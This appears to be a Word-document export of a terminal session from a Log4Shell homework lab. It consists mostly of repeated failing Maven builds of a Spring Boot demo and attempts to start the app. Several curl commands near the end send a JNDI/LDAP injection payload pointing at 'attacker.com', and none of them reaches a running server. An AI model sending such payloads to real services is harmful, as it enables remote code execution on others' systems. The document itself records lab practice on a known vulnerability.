    <w:p w14:paraId="1F8DA6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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183EE7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04E7C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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D92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6F7CF4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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C568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5B46C3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Total time:  3.104 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D0810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Finished at: 2025-05-28T23:49:36Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF1DE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12F3A33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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage (repackage) on project log4shell-demo: Execution repackage of goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage failed: Unable to find main class -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA10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0DF0D14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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A98F6C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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0940A2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0FA565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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572487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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F66EA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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E97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6E4BA3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66C39F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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CDC1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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65727E8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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D1D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919EE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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DC38F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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258146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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7F302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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096651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354540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3CD4ED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4F9B50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146D36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CE184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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A90B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1A3D04E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1F119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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095E0EB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786627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0207BC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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3FB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873E5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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21373C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5F2B43D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9D6AD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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC827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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BACF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746B1A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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1A49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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0183B59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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DAD50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A2A24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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD02D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466BB11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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C76DC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66E7F7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 Total time:  3.080 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0C83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Finished at: 2025-05-28T23:51:47Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C93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44236F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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage (repackage) on project log4shell-demo: Execution repackage of goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage failed: Unable to find main class -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E67AE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0AA98B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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255E1F7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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EAD8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1A76E0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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9F971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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7574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logging.level.root=INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B109A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-bash: logging.level.root=INFO: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171528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touch src/main/resources/application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B6267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touch: cannot touch 'src/main/resources/application.properties': No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EFAAA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clean install -U</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C72C4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59EFEB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643ABD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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7A94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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4599BC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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EFAD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6D07C1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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47362AD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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04157C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74E70C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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2749AE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50BA47C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155FFD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1E8537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 skip non existing resourceDirectory /home/ec2-user/log4shell-homework/src/main/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A79E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472B5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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC51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40C401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A77832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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EF06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0DD536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4793A0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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0586B46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BC2D0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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBDAC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567D802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27A947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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24395C6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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B18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23F50C3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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE1C3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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121941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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE4A7E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80AB1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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D53A74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1D44B2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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F826C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79832A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Total time:  3.246 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FDD7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Finished at: 2025-05-28T23:54:20Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2038AB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3912F0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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage (repackage) on project log4shell-demo: Execution repackage of goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage failed: Unable to find main class -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269566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[ERROR]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9319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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42446B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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D191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63CB36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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FD8F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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B75DBC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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237CBA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031096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2E76B21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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9AA7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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A198C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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0134EB3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663122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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F640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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530E7F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6E3599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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194C44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1DFD90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23A59B0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2339B1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77542C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336F7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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED405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46F5AD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5A1FE9B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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1557186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494F32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7E5DD6F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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710BB2E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DBB36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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7EE5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524343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981E87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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFB19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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D97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046A63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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0072B2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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B49635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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5974A2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6A8705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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E2A0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092F81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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E852A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55C721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Total time:  3.208 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F86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Finished at: 2025-05-28T23:54:35Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788BBB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23AFA8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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage (repackage) on project log4shell-demo: Execution repackage of goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage failed: Unable to find main class -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DEE21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1593F4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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682A01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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7EB3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4DB2E8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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6382AC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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273261A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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D979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7C2056B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FAAE1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 ---------------------&lt; com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599408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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2053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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3622580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5E98F1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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C878B9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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6703DB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A0F6D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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE089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2D160F9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426217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483C14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43EFDC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63E9D71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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED4B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567AEA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48045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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F204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6AB514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3FE908B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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0083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0B97E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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5742854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2DFF79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CD7221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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24436E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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FF5D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64AF46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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334104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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F65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 Building jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D265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08A30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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20860F5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52071D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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FAE7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3599FB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Total time:  3.193 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5DF1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Finished at: 2025-05-29T00:21:12Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FD98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78E21ED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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage (repackage) on project log4shell-demo: Execution repackage of goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage failed: Unable to find main class -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C6C3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054DA8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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F33E8C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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557560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13160C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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD7F4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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC442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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462603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3B6AA43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052B503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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B10D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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485502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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C03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6501DA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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1330A72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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C89510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AF5FC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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D4DEF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56797C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 Using 'UTF-8' encoding to copy filtered properties files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E70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1246B6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3DE0A4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6E1C58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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508A53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65A022A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B5E958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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069BE1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253108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651096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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486A8A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A4322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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C965A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6F1ECD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0BC3E4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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75238B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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBBDE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54E52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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C1D1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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7DB3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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776745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FD275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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E30F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Replacing main artifact with repackaged archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDF55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5EF2E2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 SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D681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0E3802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Total time:  3.380 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B8B93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Finished at: 2025-05-29T00:23:19Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA63B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 ------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063D44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curl "http://18.117.114.253:8080/log?message=\${jndi:ldap://attacker.com:1389/a}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776F1D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curl: (28) Failed to connect to 18.117.114.253 port 8080 after 133912 ms: Couldn't connect to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC57C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sudo lsof -i :8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CA7F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netstat -tulnp | grep 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1503E32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(Not all processes could be identified, non-owned process info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D38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will not be shown, you would have to be root to see it all.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED442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java -jar yourapp.jar --server.address=0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401836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Unable to access jarfile yourapp.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF8FD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curl "http://localhost:8080/log?message=\${jndi:ldap://attacker.com:1389/a}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A148A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curl: (7) Failed to connect to localhost port 8080 after 0 ms: Couldn't connect to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211BA99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ps aux | grep java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D46B8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ec2-user   80196  0.0  0.2 222316  1988 pts/0    S+   00:34   0:00 grep --color=auto java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D30AA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spring-boot:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06BAA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3033E5E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52076F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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02566E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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC80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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E36AD1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229B02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&gt;&gt;&gt; spring-boot-maven-plugin:2.5.5:run (default-cli) &gt; test-compile @ log4shell-demo &gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB33D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0A3BEA1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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379007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2B6CC09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062451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3A66822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099BE2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C470B1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 --- maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C80F8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4ACBFD7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0EC843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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DB33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7B63E0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41A904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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E15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93898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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B338D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53D20B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C22D1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&lt;&lt;&lt; spring-boot-maven-plugin:2.5.5:run (default-cli) &lt; test-compile @ log4shell-demo &lt;&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED7D7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597059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62C02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spring-boot-maven-plugin:2.5.5:run (default-cli) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2159A6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Attaching agents: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0759C8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Could not find or load main class com.example.log4shell.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7EEC0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Caused by: java.lang.ClassNotFoundException: com.example.log4shell.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12322C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29E9AC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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048CF7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2F124D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Total time:  2.298 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4051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Finished at: 2025-05-29T00:34:47Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A91B7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432720F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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) on project log4shell-demo: Application finished with exit code: 1 -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F27AD9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403A82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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5AE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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E20C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560928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[ERROR] For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865E8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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A43E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java -jar target/log4shell-demo-0.0.1-SNAPSHOT.jar --server.address=0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100765D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Exception in thread "main" java.lang.ClassNotFoundException: com.example.log4shell.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB0E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java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:445)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC70D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java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:592)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5338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org.springframework.boot.loader.LaunchedURLClassLoader.loadClass(LaunchedURLClassLoader.java:151)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1E6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java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:525)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DECD83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java.base/java.lang.Class.forName0(Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F98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java.base/java.lang.Class.forName(Class.java:467)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57034D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org.springframework.boot.loader.MainMethodRunner.run(MainMethodRunner.java:46)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C3BBB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org.springframework.boot.loader.Launcher.launch(Launcher.java:108)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540662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org.springframework.boot.loader.Launcher.launch(Launcher.java:58)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140A540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org.springframework.boot.loader.JarLauncher.main(JarLauncher.java:88)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B476C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Tomcat started on port(s): 8080 (http)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1206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-bash: syntax error near unexpected token `('</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048229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Tomcat started on port(s): 8080 (http)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E39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-bash: syntax error near unexpected token `('</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E4AC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curl "http://localhost:8080/log?message=\${jndi:ldap://attacker.com:1389/a}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0337FD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curl: (7) Failed to connect to localhost port 8080 after 0 ms: Couldn't connect to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C9F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ps aux | grep java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E26C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ec2-user   80263  0.0  0.2 222316  2000 pts/0    S+   00:35   0:00 grep --color=auto java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3227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Started Log4ShellDemoApplication in X seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31162B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-bash: Started: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A83A6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sudo lsof -i :8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B5D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spring-boot:run -X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A64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Apache Maven 3.8.4 (Red Hat 3.8.4-3.amzn2023.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B0AD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Maven home: /usr/share/maven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBAA9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Java version: 17.0.15, vendor: Amazon.com Inc., runtime: /usr/lib/jvm/java-17-amazon-corretto.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FBEE5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Default locale: en, platform encoding: UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F2919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OS name: "linux", version: "6.1.134-152.225.amzn2023.x86_64", arch: "amd64", family: "unix"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC8F4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Created new class realm maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746BC6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Importing foreign packages into class realm maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BD7E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javax.annotation.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319F3D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javax.annotation.security.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450627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javax.inject.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182E92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 &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC02E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org.apache.maven.artifact &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CF8B7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org.apache.maven.classrealm &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15273C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org.apache.maven.cli &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E07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org.apache.maven.configuration &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5577A6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org.apache.maven.exception &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F7E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org.apache.maven.execution &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B070A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org.apache.maven.execution.scope &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183792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org.apache.maven.lifecycle &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270895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org.apache.maven.model &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F65AC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org.apache.maven.monitor &lt; plexus.core</w:t>
      </w:r>
    </w:p>
